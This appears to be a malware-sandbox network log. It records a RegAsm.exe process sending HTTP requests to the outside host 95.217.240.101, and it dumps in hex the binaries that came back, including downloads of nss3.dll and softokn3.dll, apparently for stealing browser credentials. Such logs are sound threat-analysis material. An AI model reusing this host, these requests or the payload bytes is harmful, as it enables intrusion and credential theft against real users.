                                                                              2024-05-17 16:06:27 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                              Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                              2024-05-17 16:06:27 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                              Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                              Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                              Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                              Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                              Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                              Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                              2024-05-17 16:06:28 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                              Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.54972395.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:30 UTC217OUTGET /nss3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:30 UTC248INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:30 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2046288
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-1f3950"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:30 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                              2024-05-17 16:06:30 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                              Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                              Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                              Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                              Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                              Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                              Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                              Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                              Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                              2024-05-17 16:06:31 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                              Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.54972495.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:34 UTC221OUTGET /softokn3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:35 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:34 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 257872
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-3ef50"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:35 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                              Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
